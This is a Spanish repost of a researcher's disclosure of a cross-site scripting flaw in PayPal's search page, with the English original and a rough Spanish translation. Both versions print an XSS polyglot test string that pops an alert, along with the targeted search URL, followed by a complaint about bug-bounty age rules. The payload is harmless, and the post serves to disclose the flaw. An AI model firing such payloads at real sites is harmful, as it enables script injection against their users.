VULNERABILIDAD XSS EN PAyPAL

 Segun este correo electronico, se advierte de la localización de un fallo de xss en paypal, aunque parece que paypal esta al corriente y lo esta solucionando, lo publicamos por si acaso, el texto viene el mensaje original y su traduccion, un saludo a todos

PayPal.com XSS Vulnerability
    

PayPal.com XSS Vulnerability
Hello all!

I'm Robert Kugler a 17 years old German student who's interested in
securing computer systems.

I would like to warn you that PayPal.com is vulnerable to a Cross-Site
Scripting vulnerability!
PayPal Inc. is running a bug bounty program for professional security
researchers.

https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues

XSS vulnerabilities are in scope. So I tried to take part and sent my find
to PayPal Site Security.

The vulnerability is located in the search function and can be triggered
with the following javascript code:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search

Screenshot: http://picturepush.com/public/13144090

Unfortunately PayPal disqualified me from receiving any bounty payment
because of being 17 years old...

PayPal Site Security:

"To be eligible for the Bug Bounty Program, you *must not*:
... Be less than 18 years of age.If PayPal discovers that a researcher does
not meet any of the criteria above, PayPal will remove that researcher from
the Bug Bounty Program and disqualify them from receiving any bounty
payments."

I don’t want to allege PayPal a kind of bug bounty cost saving, but it’s
not the best idea when you're interested in motivated security
researchers...

Best regards,

Robert Kugler
_______________________________________________

PayPal.com XSS Vulnerability Robert Kugler (May 25)











PayPal.com XSS Vulnerability

    
PayPal.com XSS Vulnerability
Hola a todos! Soy Robert Kugler un estudiante alemán de 17 años que esté interesado en protección de los sistemas informáticos. Me gustaría advertirle que PayPal.com es vulnerable a un Cross-Site Vulnerabilidad de secuencias de comandos! PayPal Inc. está ejecutando un programa de recompensas de errores de seguridad profesional investigadores.

https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues

Vulnerabilidades XSS son de alcance. Así que traté de tomar parte y envié mi hallazgo a PayPal Seguridad del Sitio. La vulnerabilidad se encuentra en la función de búsqueda y puede ser activado con el siguiente código javascript:

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search

Screenshot: http://picturepush.com/public/13144090

Desafortunadamente PayPal me dice que no  tendré derecho a recibir ningún pago de recompensas por tener 17 años … PayPal Seguridad del Sitio: "Para ser elegible para el programa de recompensas de errores, que * no * debe: … Ser menor de 18 años de age.If PayPal descubre que un investigador hace no cumple ninguno de los criterios anteriores, PayPal quitar ese investigador de el Programa Bug Bounty y descalificaría para recibir cualquier prima pagos ". No quiero alegar PayPal una especie de bicho recompensa ahorro de costes, pero es no es la mejor idea cuando se está interesado en la seguridad motivado investigadores ... Saludos cordiales,

Robert Kugler
_______________________________________________